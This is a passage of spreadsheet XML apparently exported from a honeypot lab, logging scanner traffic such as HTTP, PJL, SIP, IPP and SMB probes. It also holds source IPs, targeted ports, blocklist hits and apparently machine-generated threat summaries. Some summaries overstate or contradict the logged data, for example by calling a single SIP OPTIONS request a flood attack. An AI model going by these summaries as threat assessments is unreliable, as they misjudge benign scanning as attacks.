Host: 66.94.127.183:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.224.106:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.202,36040)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.202,52762)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (PxBVeGlc,)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.202,48940)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (FnFmxuxU,)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.115.66:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 103.211.202.140:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.180.55.39:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.202;rport=55739'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8dca</t>
  </si>
  <si>
    <t>Possible brute force attack against POP3 service is occurring, with a failed login attempt being reported as "NA" which suggests no authentication information was provided or attempt was unsuccessful. The lack of authentication details may indicate an automated or scripted attempt to gain access. This could be a sign of reconnaissance by potential malicious actor.</t>
  </si>
  <si>
    <t>8b35965f063226cbe05d4e5414e71675</t>
  </si>
  <si>
    <t>87.236.176.142</t>
  </si>
  <si>
    <t>cheerful.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_POP3_H8&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_SOCKS5_H30&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_IRC_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;445&amp;&amp;NA&amp;&amp;161&amp;&amp;1433&amp;&amp;29908&amp;&amp;6379&amp;&amp;443&amp;&amp;5432&amp;&amp;110&amp;&amp;1521&amp;&amp;3306&amp;&amp;9100&amp;&amp;1080&amp;&amp;6667&amp;&amp;143&amp;&amp;25&amp;&amp;21&amp;&amp;5900&amp;&amp;80&amp;&amp;23</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'spamrbl.imp.ch': ['unknown']}</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;request&amp;&amp;GET&amp;&amp;query&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IRC:{'command': '};;', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'llbbkmji', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.142;tag=llbbkmji', 'max-forwards': '0', 'to': 'sip:194.233.76.135', 'via': 'SIP/2.0/UDP 87.236.176.142:5060;branch=z9hG4bKllbbkmji;received=87.236.176.142;rport=56969'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.142,37719)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.142,53879)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': 'vmi1469317.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 109.123.229.33:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:57ec:b08e</t>
  </si>
  <si>
    <t>No Redis service activity detected, but possible attempts to access or exploit this service are being monitored. 
This could be an attempt by malicious actors to abuse or scan the system for vulnerabilities related to Redis services. 
No actual interaction with Redis services has been recorded so far. &amp;&amp; There is insufficient log data provided to analyze potential malicious activity. 
However, if I were to explain what this statement typically means:
No available information indicates any suspicious behavior or security threats have been detected. This could be due to lack of access attempts or no anomalies in the system logs. The absence of logged events may indicate normal system operation within expected parameters. &amp;&amp; No connection attempt detected for IMAP service, indicating potential evasion tactics by malicious actors who may be probing the system's defenses. 
Possible exploitation of default settings or misconfiguration.
Activity seems to lack intent, but warrants further investigation due to its absence from normal traffic patterns. &amp;&amp; This log suggests a probing activity where an attacker is attempting to gather information about the available services. The OPTIONS command is typically used for discovering capabilities and configuration of networked servers. This could be a reconnaissance step in a larger attack. &amp;&amp; A malicious entity is attempting to send a SIP OPTIONS request from IP address 209.145.61.177, possibly for reconnaissance or enumeration purposes.
This could be part of a larger attack aimed at identifying vulnerabilities in the network.
The request may also be used to probe the network's defenses and identify potential targets. &amp;&amp; Possible SIP flood attack, attempting to send a SIP request through TCP to IP address 87.236.176.142 port 5060. This may be an attempt to overwhelm the target system with unnecessary traffic. Malicious activity detected, potentially for scanning or exploitation purposes. &amp;&amp; Possible malicious activity: An attempt to establish a connection using an unusual SIP method, possibly related to a VoIP attack or exploitation of a vulnerability in a communication service.
This action may be an initial step in a larger cyber attack aiming to hijack or disrupt legitimate voice over internet protocol (VoIP) communications.
Further investigation is required to determine the intentions and potential impact.</t>
  </si>
  <si>
    <t>DDoS Attack &amp;&amp; Port Scan &amp;&amp; IRCTunnel &amp;&amp; UDP Scan</t>
  </si>
  <si>
    <t>3ac6c5fa0e1b310ae95d7587f5a726f3</t>
  </si>
  <si>
    <t>167.94.138.185</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_IRC_H22&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_SIP_H4&amp;&amp;SMA-LAB_IPP_H44&amp;&amp;SMA-LAB_IRC_H29&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_POSTGRES_H21&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_HTTP_H28&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_IPP_H33&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_IPP_H12&amp;&amp;SMA-LAB_SMTP_H47&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_POP3_H27&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_SIP_H38&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_IPP_H23&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_NTP_H29&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_SIP_H28&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_POP3_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;56023&amp;&amp;143&amp;&amp;1080&amp;&amp;6667&amp;&amp;110&amp;&amp;NA&amp;&amp;631&amp;&amp;3306&amp;&amp;5900&amp;&amp;5432&amp;&amp;1433&amp;&amp;1521&amp;&amp;3389&amp;&amp;48075&amp;&amp;25&amp;&amp;6379&amp;&amp;34214&amp;&amp;34238&amp;&amp;445&amp;&amp;443&amp;&amp;123&amp;&amp;21&amp;&amp;80&amp;&amp;389&amp;&amp;23&amp;&amp;9100&amp;&amp;52278&amp;&amp;44264&amp;&amp;44272</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'spamrbl.imp.ch': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}</t>
  </si>
  <si>
    <t>2021-09-13</t>
  </si>
  <si>
    <t>connection&amp;&amp;request&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;login&amp;&amp;stshash&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,46144)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,59978)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=57417'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.26.156.60:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.26.156.60:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '95.164.21.98:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.21.98:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.181.21.224:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.181.21.224:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=58806'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=40827'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '109.123.229.33:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://109.123.229.33:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,45108)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=53343'}}&amp;&amp;{Data_HTTP:{'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': 'vmi1469317.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '95.164.118.29:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.118.29:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Host': '5.253.43.207:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=56510'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=40262'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,43070)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=40306'}}&amp;&amp;{Data_HTTP:{'Host': '194.4.48.242:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=38511'}}&amp;&amp;{Data_HTTPS:{'Host': '5.182.38.84:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,58636)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
